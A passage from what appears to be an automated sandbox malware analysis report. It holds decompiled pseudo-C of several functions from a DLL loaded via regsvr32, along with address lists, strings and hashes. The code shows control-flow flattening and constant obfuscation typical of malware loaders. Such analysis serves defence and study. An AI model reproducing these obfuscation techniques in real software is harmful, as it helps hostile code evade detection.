				_v112 = _v112 ^ 0x78303f4f;
				_v20 = 0xb18975;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x016a5223;
				_v96 = 0xedbd84;
				_v96 = _v96 + 0xffff2ec7;
				_v96 = _v96 ^ 0xf538f217;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x0033ad63;
				_v64 = 0x7b1bda;
				_v64 = _v64 + 0xe93;
				_v64 = _v64 + 0x35bb;
				_v64 = _v64 ^ 0x007d4524;
				_v100 = 0x889a09;
				_v100 = _v100 | 0xeb8a77a7;
				_v100 = _v100 * 0x4e;
				_v100 = _v100 * 0x4c;
				_v100 = _v100 ^ 0x4ab2f0bc;
				_v56 = 0x2ada96;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 >> 3;
				_v56 = _v56 ^ 0x000959c6;
				_v60 = 0x832bff;
				_v60 = _v60 ^ 0xb6b19378;
				_v60 = _v60 | 0x598174e9;
				_v60 = _v60 ^ 0xffb2d2e6;
				_v92 = 0x8f1f14;
				_v92 = _v92 + 0x7936;
				_v92 = _v92 + 0xffff03c3;
				_v92 = _v92 ^ 0x1b660ddb;
				_v92 = _v92 ^ 0x1bed8132;
				_v8 = 0xbd6954;
				_v8 = _v8 + 0x5ee5;
				_v8 = _v8 ^ 0x00b1750b;
				while(1) {
					L1:
					_t319 =  *0x10025084;
					while(1) {
						_t273 = 0x250f141;
						do {
							L3:
							if(_t327 == _t273) {
								_t297 = _v108;
								_t275 = E1000C706(_t297, _v16, _v68, _v112,  *((intOrPtr*)( *0x10025084 + 0x2c)), _v4, _v20,  *((intOrPtr*)(_t319 + 0x28))); // executed
								_t331 =  &(_t331[6]);
								if(_t275 != _v104) {
									_t327 = 0x7d95f8c;
									goto L14;
								} else {
									_t327 = 0xb652690;
									_t291 = 1;
									goto L1;
								}
							} else {
								if(_t327 == 0x2b8a739) {
									_push(_v84);
									_push(_v44);
									_push(_v40);
									E1000D68B(0, _v72, _v120, E10004BB4(0x100014c8, _v80), _v36,  &_v4, _v76); // executed
									_t297 = _v24;
									_t327 =  ==  ? 0x250f141 : 0x7d95f8c;
									E1000B9D7(_t297, _v28, _t277, _v116);
									_t331 =  &(_t331[0xa]);
									L14:
									_t319 =  *0x10025084;
									_t273 = 0x250f141;
									goto L15;
								} else {
									if(_t327 == 0x7483d93) {
										_push(_t297);
										_t301 = 0x48;
										_t284 = E1001EAA3(_t301);
										 *0x10025084 = _t284;
										 *((intOrPtr*)(_t284 + 0x2c)) = 0x4000;
										_t287 = E1001EAA3( *((intOrPtr*)( *0x10025084 + 0x2c))); // executed
										_t319 =  *0x10025084;
										_t327 = 0x2b8a739;
										_t297 =  *((intOrPtr*)(_t319 + 0x2c)) + _t287;
										 *((intOrPtr*)(_t319 + 0x28)) = _t287;
										 *((intOrPtr*)(_t319 + 0x10)) = _t287;
										 *((intOrPtr*)(_t319 + 0x24)) = _t287;
										 *(_t319 + 0xc) = _t297;
										_t273 = 0x250f141;
										continue;
									} else {
										if(_t327 == 0x7d95f8c) {
											E10006A8D(_v56, _v60,  *((intOrPtr*)(_t319 + 0x28)));
											E10006A8D(_v92, _v8,  *0x10025084);
										} else {
											if(_t327 != 0xb652690) {
												goto L15;
											} else {
												E1000D5CB(_v96, _v4, _v64, _v12, _v100);
											}
										}
									}
								}
							}
							L18:
							return _t291;
							L15:
						} while (_t327 != 0xf77a0af);
						goto L18;
					}
				}
			}

0x1001d14c
0x1001d14f
0x1001d159
0x1001d161
0x1001d172
0x1001d176
0x1001d178
0x1001d180
0x1001d185
0x1001d193
0x1001d198
0x1001d19e
0x1001d1a6
0x1001d1ae
0x1001d1b7
0x1001d1bc
0x1001d1c2
0x1001d1ca
0x1001d1d2
0x1001d1da
0x1001d1e2
0x1001d1e7
0x1001d1ef
0x1001d1f7
0x1001d202
0x1001d20d
0x1001d218
0x1001d220
0x1001d22d
0x1001d22e
0x1001d232
0x1001d237
0x1001d23f
0x1001d247
0x1001d24f
0x1001d257
0x1001d25f
0x1001d264
0x1001d269
0x1001d271
0x1001d279
0x1001d281
0x1001d289
0x1001d291
0x1001d296
0x1001d29b
0x1001d2a3
0x1001d2ab
0x1001d2b3
0x1001d2bb
0x1001d2c3
0x1001d2cb
0x1001d2d3
0x1001d2db
0x1001d2e3
0x1001d2e7
0x1001d2ef
0x1001d2f7
0x1001d305
0x1001d309
0x1001d311
0x1001d319
0x1001d321
0x1001d329
0x1001d33a
0x1001d340
0x1001d344
0x1001d349
0x1001d351
0x1001d359
0x1001d361
0x1001d369
0x1001d371
0x1001d379
0x1001d381
0x1001d389
0x1001d391
0x1001d399
0x1001d39d
0x1001d3a5
0x1001d3b3
0x1001d3b7
0x1001d3bf
0x1001d3c7
0x1001d3cf
0x1001d3d7
0x1001d3df
0x1001d3e7
0x1001d3ef
0x1001d3f7
0x1001d3ff
0x1001d403
0x1001d40b
0x1001d413
0x1001d41b
0x1001d423
0x1001d428
0x1001d430
0x1001d438
0x1001d440
0x1001d448
0x1001d450
0x1001d458
0x1001d465
0x1001d46e
0x1001d472
0x1001d47a
0x1001d482
0x1001d487
0x1001d48c
0x1001d494
0x1001d49c
0x1001d4a4
0x1001d4ac
0x1001d4b4
0x1001d4bc
0x1001d4c4
0x1001d4cc
0x1001d4d4
0x1001d4dc
0x1001d4e7
0x1001d4f2
0x1001d4fd
0x1001d4fd
0x1001d4fd
0x1001d503
0x1001d503
0x1001d508
0x1001d508
0x1001d50a
0x1001d645
0x1001d649
0x1001d64e
0x1001d655
0x1001d664
0x00000000
0x1001d657
0x1001d659
0x1001d65e
0x00000000
0x1001d65e
0x1001d510
0x1001d516
0x1001d5b4
0x1001d5bd
0x1001d5c1
0x1001d5eb
0x1001d606
0x1001d613
0x1001d616
0x1001d61b
0x1001d666
0x1001d666
0x1001d66c
0x00000000
0x1001d51c
0x1001d522
0x1001d567
0x1001d56a
0x1001d56b
0x1001d570
0x1001d575
0x1001d58d
0x1001d592
0x1001d598
0x1001d5a1
0x1001d5a3
0x1001d5a6
0x1001d5a9
0x1001d5ac
0x1001d503
0x00000000
0x1001d524
0x1001d526
0x1001d68a
0x1001d6a0
0x1001d52c
0x1001d532
0x00000000
0x1001d538
0x1001d552
0x1001d557
0x1001d532
0x1001d526
0x1001d522
0x1001d516
0x1001d6aa
0x1001d6b0
0x1001d671
0x1001d671
0x00000000
0x1001d67d
0x1001d503

Strings

zBP, xrefs: 1001D349
^, xrefs: 1001D4E7
$E}, xrefs: 1001D448
E&c, xrefs: 1001D257
6y, xrefs: 1001D4BC
O?0x, xrefs: 1001D3EF
McA, xrefs: 1001D218
1F, xrefs: 1001D2C3

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $E}$1F$6y$E&c$McA$O?0x$zBP$^
API String ID: 0-1306660940
Opcode ID: 045072644e42cd77b24490582f42b08238b7a1c9d0c5e58ade04e4e6f1b94d30
Instruction ID: be7faa0b07a5473724cf9ccdeb0237ef30fe517349735110f4831b39dc336543
Opcode Fuzzy Hash: 045072644e42cd77b24490582f42b08238b7a1c9d0c5e58ade04e4e6f1b94d30
Instruction Fuzzy Hash: 51D122715093819FC364DF24D58950FBBE2FBC8758F20891DF19A8A260D7B1D949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 10004700 Relevance: 10.2, Strings: 8, Instructions: 218
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E10004700() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t236;
				signed int _t240;
				void* _t242;
				void* _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int* _t281;

				_t281 =  &_v1124;
				_v1092 = 0x85f399;
				_v1092 = _v1092 << 0x10;
				_t242 = 0x39c6eb9;
				_v1092 = _v1092 + 0x8beb;
				_v1092 = _v1092 ^ 0xf396a90d;
				_v1096 = 0xef4058;
				_t9 =  &_v1096; // 0xef4058
				_v1096 =  *_t9 * 0x13;
				_t273 = 0;
				_t240 = 0x60;
				_v1096 = _v1096 / _t240;
				_v1096 = _v1096 >> 4;
				_v1096 = _v1096 ^ 0x00098afd;
				_v1104 = 0xb9ae5b;
				_t274 = 0xb;
				_v1104 = _v1104 * 0x2d;
				_v1104 = _v1104 | 0x46d77d2f;
				_v1104 = _v1104 << 7;
				_v1104 = _v1104 ^ 0x7bf1cc8c;
				_v1100 = 0x19059b;
				_v1100 = _v1100 + 0xffff54a1;
				_v1100 = _v1100 ^ 0x056537fc;
				_v1100 = _v1100 + 0xffff8f61;
				_v1100 = _v1100 ^ 0x057c06ef;
				_v1116 = 0xc97c63;
				_v1116 = _v1116 / _t274;
				_t275 = 0x24;
				_v1116 = _v1116 / _t275;
				_v1116 = _v1116 << 0xe;
				_v1116 = _v1116 ^ 0x20999b29;
				_v1056 = 0x452be2;
				_t57 =  &_v1056; // 0x452be2
				_t276 = 0x4c;
				_v1056 =  *_t57 * 0x3d;
				_v1056 = _v1056 ^ 0x1078df33;
				_v1108 = 0xec6add;
				_v1108 = _v1108 * 0x7d;
				_v1108 = _v1108 + 0x8e6b;
				_v1108 = _v1108 * 0x25;
				_v1108 = _v1108 ^ 0xaf40b5b6;
				_v1120 = 0xc42eb0;
				_v1120 = _v1120 | 0xef657681;
				_v1120 = _v1120 / _t276;
				_v1120 = _v1120 + 0x8952;
				_v1120 = _v1120 ^ 0x032be80e;
				_v1124 = 0xf119d6;
				_v1124 = _v1124 + 0xfffffbbb;
				_v1124 = _v1124 | 0x0bb76f92;
				_v1124 = _v1124 * 0x41;
				_v1124 = _v1124 ^ 0x09d6e2b8;
				_v1064 = 0xf9699f;
				_v1064 = _v1064 ^ 0xacf22dac;
				_v1064 = _v1064 ^ 0xac06f458;
				_v1084 = 0x99888d;
				_v1084 = _v1084 + 0xffff88e5;
				_t277 = 0x2c;
				_v1084 = _v1084 / _t277;
				_v1084 = _v1084 ^ 0x0005f451;
				_v1044 = 0xb74b5f;
				_v1044 = _v1044 << 0xc;
				_v1044 = _v1044 ^ 0x74b68ce9;
				_v1060 = 0xe79d94;
				_v1060 = _v1060 >> 0xd;
				_v1060 = _v1060 ^ 0x000678c5;
				_v1112 = 0x3d4291;
				_v1112 = _v1112 ^ 0x4a120c0a;
				_v1112 = _v1112 ^ 0x763db11c;
				_v1112 = _v1112 | 0x17eaf87c;
				_v1112 = _v1112 ^ 0x3ff735f3;
				_v1076 = 0x78d50b;
				_v1076 = _v1076 + 0x5627;
				_t278 = 0x57;
				_v1076 = _v1076 * 0x1f;
				_v1076 = _v1076 ^ 0x0ea150a9;
				_v1088 = 0xe52eef;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 >> 0xe;
				_v1088 = _v1088 ^ 0x000808f7;
				_v1068 = 0x48fca6;
				_v1068 = _v1068 + 0xffffa6b4;
				_v1068 = _v1068 ^ 0x00409dcf;
				_v1048 = 0x25a41f;
				_v1048 = _v1048 / _t240;
				_v1048 = _v1048 ^ 0x000ce80f;
				_v1052 = 0xef46b0;
				_v1052 = _v1052 * 0x26;
				_v1052 = _v1052 ^ 0x2381a207;
				_v1072 = 0x2f5a0a;
				_v1072 = _v1072 >> 0xe;
				_v1072 = _v1072 * 0x49;
				_v1072 = _v1072 ^ 0x00074685;
				_v1080 = 0x4b2d01;
				_v1080 = _v1080 / _t278;
				_v1080 = _v1080 + 0xffffb4d1;
				_v1080 = _v1080 ^ 0x000938e4;
				do {
					while(_t242 != 0x39c6eb9) {
						if(_t242 == 0x4514016) {
							E10009574(_v1092,  &_v520, _v1096, _v1104);
							_t281 =  &(_t281[3]);
							_t242 = 0xca7a35d;
							continue;
						} else {
							if(_t242 == 0xca7a35d) {
								_push(_v1108);
								_push(_v1056);
								_push(_v1116);
								E1001734A(_v1120, __eflags, _v1124, _v1064, _v1084,  &_v1040, E10004BB4(0x10001200, _v1100), _v1044, 0x10001200,  *0x10024208);
								E1000B9D7(_v1060, _v1112, _t230, _v1076);
								_t281 =  &(_t281[0xd]);
								_t242 = 0xd6c4022;
								continue;
							} else {
								if(_t242 == 0xd6c4022) {
									_t236 = E1002110E(_v1088, _v1068, __eflags, _v1048,  &_v1040,  &_v520); // executed
									_t281 =  &(_t281[3]);
									__eflags = _t236;
									_t273 =  !=  ? 1 : _t273;
									_t242 = 0xed7a277;
									continue;
								} else {
									if(_t242 != 0xed7a277) {
										goto L12;
									} else {
										E1000D346(_v1052, _v1072,  &_v1040, _v1080); // executed
									}
								}
							}
						}
						L7:
						return _t273;
					}
					_t242 = 0x4514016;
					L12:
					__eflags = _t242 - 0x8bb3864;
				} while (__eflags != 0);
				goto L7;
			}

0x10004700
0x10004706
0x10004710
0x10004715
0x1000471a
0x10004722
0x1000472a
0x10004732
0x1000473b
0x1000473f
0x10004747
0x1000474c
0x10004752
0x10004757
0x1000475f
0x1000476c
0x1000476f
0x10004773
0x1000477b
0x10004780
0x10004788
0x10004790
0x10004798
0x100047a0
0x100047a8
0x100047b0
0x100047c0
0x100047c8
0x100047cd
0x100047d3
0x100047d8
0x100047e0
0x100047e8
0x100047ed
0x100047ee
0x100047f2
0x100047fa
0x10004807
0x1000480b
0x10004818
0x1000481c
0x10004824
0x1000482c
0x1000483a
0x1000483e
0x10004846
0x1000484e
0x10004856
0x1000485e
0x1000486b
0x1000486f
0x10004877
0x1000487f
0x10004887
0x1000488f
0x10004897
0x100048a7
0x100048b1
0x100048b5
0x100048bd
0x100048c5
0x100048ca
0x100048d2
0x100048da
0x100048df
0x100048e7
0x100048ef
0x100048f7
0x100048ff
0x10004907
0x1000490f
0x10004917
0x10004926
0x10004927
0x1000492b
0x10004933
0x1000493b
0x10004940
0x10004945
0x1000494d
0x10004955
0x1000495d
0x10004965
0x1000497a
0x1000497e
0x10004986
0x10004993
0x10004997
0x1000499f
0x100049a7
0x100049b1
0x100049b5
0x100049bd
0x100049cb
0x100049cf
0x100049d7
0x100049df
0x100049df
0x100049ed
0x10004ae7
0x10004aec
0x10004aef
0x00000000
0x100049f3
0x100049f5
0x10004a63
0x10004a6c
0x10004a70
0x10004aaf
0x10004ac1
0x10004ac6
0x10004ac9
0x00000000
0x100049f7
0x100049fd
0x10004a49
0x10004a50
0x10004a54
0x10004a56
0x10004a59
0x00000000
0x100049ff
0x10004a05
0x00000000
0x10004a0b
0x10004a1c
0x10004a22
0x10004a05
0x100049fd
0x100049f5
0x10004a23
0x10004a2f
0x10004a2f
0x10004af6
0x10004af8
0x10004af8
0x10004af8
0x00000000

Strings

Z/, xrefs: 1000499F
"@l, xrefs: 100049F7
., xrefs: 10004933
'V, xrefs: 10004917
8, xrefs: 100049D7
X@, xrefs: 10004732
+E, xrefs: 100047E8
"@l, xrefs: 10004AC9

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Z/$"@l$"@l$'V$X@$+E$.$8
API String ID: 0-1688458359
Opcode ID: 6acd8d2e6841ac99df535c05cc9f9f7ebd8e786fd1522d01dd4659333fd60201
Instruction ID: 43322720c6f579bd7ccb0407d0888dd73e670fa5e9e229e41118b221c3f63ec1
Opcode Fuzzy Hash: 6acd8d2e6841ac99df535c05cc9f9f7ebd8e786fd1522d01dd4659333fd60201
Instruction Fuzzy Hash: EBA121B15083818FD754CF65C48980BFBE1FBC9358F108A1EF2A696260D7B5DA098F47

Uniqueness

Uniqueness Score: -1.00%

Function 10003511 Relevance: 9.1, Strings: 7, Instructions: 371
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E10003511(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* __ecx;
				void* _t324;
				intOrPtr _t354;
				void* _t369;
				signed int _t371;
				intOrPtr _t374;
				intOrPtr _t376;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr _t389;
				void* _t424;
				intOrPtr* _t432;
				signed int _t435;
				intOrPtr _t440;
				signed int* _t442;
				void* _t444;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t324);
				_v12 = 0x15d52b;
				_t376 = 0;
				_v8 = 0;
				_t442 =  &(( &_v160)[5]);
				_v4 = 0;
				_v112 = 0xc67f7e;
				_t435 = 0xef75db7;
				_v112 = _v112 ^ 0xf9841643;
				_t440 = 0;
				_v112 = _v112 ^ 0xffaaa63a;
				_v112 = _v112 | 0xed3459f6;
				_v112 = _v112 ^ 0xeffcdff6;
				_v84 = 0x249365;
				_v84 = _v84 + 0x3f96;
				_v84 = _v84 ^ 0x5f8594cb;
				_v84 = _v84 ^ 0x5fa14631;
				_v28 = 0x2cb389;
				_t378 = 0xc;
				_v28 = _v28 / _t378;
				_v28 = _v28 ^ 0x0003b9a1;
				_v72 = 0xe8815e;
				_t379 = 0x7a;
				_v72 = _v72 / _t379;
				_t380 = 0x73;
				_v72 = _v72 * 0x5c;
				_v72 = _v72 ^ 0x00a081ef;
				_v132 = 0x333c6a;
				_v132 = _v132 | 0x4b90d66a;
				_v132 = _v132 ^ 0x6a33d1a4;
				_v132 = _v132 >> 0xf;
				_v132 = _v132 ^ 0x000e1c33;
				_v148 = 0xd6ca46;
				_v148 = _v148 >> 5;
				_v148 = _v148 / _t380;
				_v148 = _v148 | 0x9cfe8c3f;
				_v148 = _v148 ^ 0x9cfcd227;
				_v80 = 0x58b45a;
				_v80 = _v80 << 0xd;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x0b42a7b7;
				_v152 = 0xefdf4e;
				_t381 = 0x79;
				_v152 = _v152 * 0x35;
				_v152 = _v152 + 0x2455;
				_v152 = _v152 | 0xed26e6d9;
				_v152 = _v152 ^ 0xfdad5268;
				_v40 = 0xcf9095;
				_v40 = _v40 + 0xffff1da8;
				_v40 = _v40 ^ 0x00ce57a1;
				_v36 = 0xf2f921;
				_v36 = _v36 / _t381;
				_v36 = _v36 ^ 0x0006e8c0;
				_v48 = 0xe42ebf;
				_t382 = 0x49;
				_v48 = _v48 / _t382;
				_v48 = _v48 ^ 0x0001c098;
				_v68 = 0xe6da5e;
				_v68 = _v68 + 0xffffada0;
				_v68 = _v68 ^ 0x00ec5072;
				_v56 = 0xab3123;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xcc4b2e92;
				_v120 = 0xa575af;
				_v120 = _v120 | 0xe5e68960;
				_v120 = _v120 ^ 0xbc9bfc27;
				_t383 = 7;
				_v120 = _v120 * 0x5b;
				_v120 = _v120 ^ 0xcf11934d;
				_v64 = 0x950c85;
				_v64 = _v64 ^ 0x89bc2ca5;
				_v64 = _v64 ^ 0x8925e027;
				_v104 = 0xd1d15a;
				_v104 = _v104 | 0x303f09bf;
				_v104 = _v104 >> 2;
				_v104 = _v104 ^ 0x0c3c88e8;
				_v76 = 0x469878;
				_v76 = _v76 | 0xacc62374;
				_v76 = _v76 + 0x4721;
				_v76 = _v76 ^ 0xacc9b5b9;
				_v32 = 0xe1a032;
				_v32 = _v32 + 0xe955;
				_v32 = _v32 ^ 0x00e7377a;
				_v144 = 0xa51711;
				_v144 = _v144 << 7;
				_v144 = _v144 << 9;
				_v144 = _v144 + 0xffff3b91;
				_v144 = _v144 ^ 0x1719e4eb;
				_v60 = 0xd4a7e0;
				_v60 = _v60 + 0xc16c;
				_v60 = _v60 ^ 0x00d35ce8;
				_v88 = 0x887cfa;
				_v88 = _v88 >> 2;
				_v88 = _v88 / _t383;
				_v88 = _v88 ^ 0x000adc3f;
				_v96 = 0x3bffe8;
				_t384 = 0x46;
				_v96 = _v96 / _t384;
				_v96 = _v96 >> 4;
				_v96 = _v96 ^ 0x000df0cb;
				_v128 = 0xdf95a3;
				_t385 = 9;
				_v128 = _v128 * 0x7a;
				_v128 = _v128 + 0xffff0a1d;
				_v128 = _v128 ^ 0xe11d907e;
				_v128 = _v128 ^ 0x8b958951;
				_v156 = 0xc38664;
				_v156 = _v156 / _t385;
				_v156 = _v156 | 0x9f1f4da2;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x3e3b6f69;
				_v160 = 0x22247f;
				_v160 = _v160 + 0xffffd4ef;
				_v160 = _v160 + 0xffff7645;
				_v160 = _v160 * 0x51;
				_v160 = _v160 ^ 0x0a964c5b;
				_v136 = 0x9f2c24;
				_t386 = 0x14;
				_v136 = _v136 / _t386;
				_v136 = _v136 + 0xffff0ac8;
				_v136 = _v136 + 0xffff673a;
				_v136 = _v136 ^ 0x000b8d16;
				_v92 = 0xc27ed7;
				_t387 = 0x7b;
				_v92 = _v92 / _t387;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x000c7f01;
				_v100 = 0xb1e109;
				_v100 = _v100 | 0xe140ea1f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01ce9a4c;
				_v140 = 0x2a934a;
				_v140 = _v140 | 0x6c0eadde;
				_v140 = _v140 + 0x8980;
				_v140 = _v140 >> 8;
				_v140 = _v140 ^ 0x006d2378;
				_v52 = 0xc5b1f3;
				_v52 = _v52 ^ 0xb5b42d6a;
				_v52 = _v52 ^ 0xb57b234e;
				_v44 = 0xbe73ed;
				_v44 = _v44 ^ 0x8c3030b7;
				_v44 = _v44 ^ 0x8c8220bb;
				_v116 = 0xf04deb;
				_t388 = 0x44;
				_v116 = _v116 / _t388;
				_v116 = _v116 + 0xffff3e3f;
				_v116 = _v116 * 0x75;
				_v116 = _v116 ^ 0x014c500b;
				_t432 = _v24;
				while(1) {
					L1:
					_t354 = _v108;
					while(1) {
						L2:
						_t424 = 0x303fbbb;
						while(1) {
							L3:
							_t389 = _v124;
							while(1) {
								L4:
								_t444 = _t435 - 0x7840373;
								if(_t444 > 0) {
									break;
								}
								if(_t444 == 0) {
									_t432 = _t432 + 0x2c;
									asm("sbb esi, esi");
									_t435 = (_t435 & 0xf6b661c6) + 0xe6c2ebf;
									continue;
								} else {
									if(_t435 == 0x24b0807) {
										_push(_t389);
										_t440 = E1001EAA3(0x2000);
										_t435 =  !=  ? 0x3764040 : 0xdde9437;
										while(1) {
											L1:
											_t354 = _v108;
											goto L2;
										}
									} else {
										if(_t435 == _t424) {
											E1001A3E6(_t389, _v112, _v144, _t440, _t389, _v60, _v88, _v96, _v128,  &_v20);
											_t435 =  !=  ? 0x6aa9401 : 0x7840373;
											_t354 = E1001A98E(_v156, _v160, _v124, _v136);
											_t442 =  &(_t442[0xa]);
											L28:
											_t424 = 0x303fbbb;
										} else {
											if(_t435 == 0x3764040) {
												_push(_t389);
												_t369 = E100113D4(_v152,  &_v16, _v40, _v36, _a4, _t389, _t389, _v48, _t389, _v68, _t389, _t376, _v56,  &_v24, _v120);
												_t442 =  &(_t442[0xf]);
												if(_t369 == 0) {
													goto L12;
												} else {
													_t371 = E1000F2B9();
													_t435 = 0x5229085;
													_t354 = _v24 * 0x2c + _t376;
													_v108 = _t354;
													_t432 =  >=  ? _t376 : (_t371 & 0x0000001f) * 0x2c + _t376;
													goto L2;
												}
												L32:
												return _t354;
											} else {
												if(_t435 == 0x5229085) {
													_t374 = E1000C4EB(_v104, _v28,  *_t432, _a4, _v76, _v32); // executed
													_t389 = _t374;
													_t442 =  &(_t442[4]);
													_t354 = _v108;
													_v124 = _t389;
													_t424 = 0x303fbbb;
													_t435 =  !=  ? 0x303fbbb : 0x7840373;
													continue;
												} else {
													_t354 = 0x6aa9401;
													if(_t435 == 0x6aa9401) {
														E1001B14E(_a8, _t440, _v92, _v84, _v100);
														_t442 =  &(_t442[3]);
														L12:
														_t435 = 0xe6c2ebf;
														while(1) {
															L1:
															_t354 = _v108;
															L2:
															_t424 = 0x303fbbb;
															L3:
															_t389 = _v124;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L29:
								if(_t435 != 0xb408503) {
									_t354 = _v108;
									goto L3;
								}
								goto L32;
							}
							if(_t435 == 0x8edf7f5) {
								_push(_t389);
								_t354 = E1001EAA3(0x20000); // executed
								_t376 = _t354;
								if(_t376 == 0) {
									_t435 = 0xb408503;
									goto L28;
								} else {
									_t435 = 0x24b0807;
									goto L1;
								}
							} else {
								if(_t435 == 0xdde9437) {
									return E10006A8D(_v44, _v116, _t376);
								}
								if(_t435 == 0xe6c2ebf) {
									E10006A8D(_v140, _v52, _t440);
									_t435 = 0xdde9437;
									while(1) {
										L1:
										_t354 = _v108;
										goto L2;
									}
								} else {
									if(_t435 == 0xef75db7) {
										_t435 = 0x8edf7f5;
										goto L4;
									}
								}
							}
							goto L29;
						}
					}
				}
			}

0x1000351b
0x10003522
0x10003529
0x10003530
0x10003532
0x10003537
0x10003542
0x10003544
0x1000354b
0x1000354e
0x10003557
0x1000355f
0x10003564
0x1000356c
0x1000356e
0x10003576
0x1000357e
0x10003586
0x1000358e
0x10003596
0x1000359e
0x100035a6
0x100035ba
0x100035bf
0x100035c8
0x100035d3
0x100035df
0x100035e4
0x100035ef
0x100035f2
0x100035f6
0x100035fe
0x10003606
0x1000360e
0x10003616
0x1000361b
0x10003623
0x1000362b
0x10003638
0x1000363c
0x10003644
0x1000364c
0x10003654
0x10003659
0x1000365d
0x10003665
0x10003672
0x10003673
0x10003677
0x1000367f
0x10003687
0x1000368f
0x1000369a
0x100036a5
0x100036b0
0x100036c4
0x100036cb
0x100036d6
0x100036ec
0x100036f1
0x100036fa
0x10003705
0x1000370d
0x10003715
0x1000371d
0x10003725
0x1000372a
0x10003732
0x1000373a
0x10003742
0x1000374f
0x10003752
0x10003756
0x1000375e
0x10003766
0x1000376e
0x10003776
0x1000377e
0x10003786
0x1000378b
0x10003793
0x1000379b
0x100037a3
0x100037ab
0x100037b3
0x100037be
0x100037c9
0x100037d4
0x100037dc
0x100037e1
0x100037e6
0x100037ee
0x100037f6
0x100037fe
0x10003806
0x1000380e
0x10003816
0x10003823
0x10003827
0x1000382f
0x1000383b
0x10003840
0x10003846
0x1000384b
0x10003853
0x10003860
0x10003861
0x10003865
0x1000386d
0x10003875
0x1000387d
0x1000388b
0x1000388f
0x10003897
0x1000389b
0x100038a3
0x100038ab
0x100038b3
0x100038c0
0x100038c4
0x100038cc
0x100038dc
0x100038e1
0x100038e7
0x100038ef
0x100038f7
0x100038ff
0x1000390b
0x10003910
0x10003916
0x1000391b
0x10003923
0x1000392b
0x10003933
0x10003938
0x10003940
0x10003948
0x10003950
0x10003958
0x1000395d
0x10003965
0x10003970
0x1000397b
0x10003986
0x10003991
0x1000399c
0x100039a7
0x100039b3
0x100039b6
0x100039ba
0x100039c7
0x100039cb
0x100039d3
0x100039da
0x100039da
0x100039da
0x100039de
0x100039de
0x100039de
0x100039e3
0x100039e3
0x100039e3
0x100039e7
0x100039e7
0x100039e7
0x100039ed
0x00000000
0x00000000
0x100039f3
0x10003b9a
0x10003b9f
0x10003ba7
0x00000000
0x100039f9
0x100039ff
0x10003b78
0x10003b83
0x10003b92
0x100039da
0x100039da
0x100039da
0x00000000
0x100039da
0x10003a05
0x10003a07
0x10003b3f
0x10003b60
0x10003b63
0x10003b68
0x10003c1e
0x10003c1e
0x10003a0d
0x10003a14
0x10003a94
0x10003adc
0x10003ae1
0x10003ae6
0x00000000
0x10003aec
0x10003af0
0x10003af8
0x10003b0a
0x10003b0e
0x10003b12
0x00000000
0x10003b12
0x10003c50
0x10003c50
0x10003a16
0x10003a1c
0x10003a6e
0x10003a73
0x10003a75
0x10003a78
0x10003a83
0x10003a87
0x10003a8c
0x00000000
0x10003a1e
0x10003a1e
0x10003a25
0x10003a40
0x10003a45
0x10003a48
0x10003a48
0x100039da
0x100039da
0x100039da
0x100039de
0x100039de
0x100039e3
0x100039e3
0x00000000
0x100039e3
0x100039da
0x10003a25
0x10003a1c
0x10003a14
0x10003a07
0x100039ff
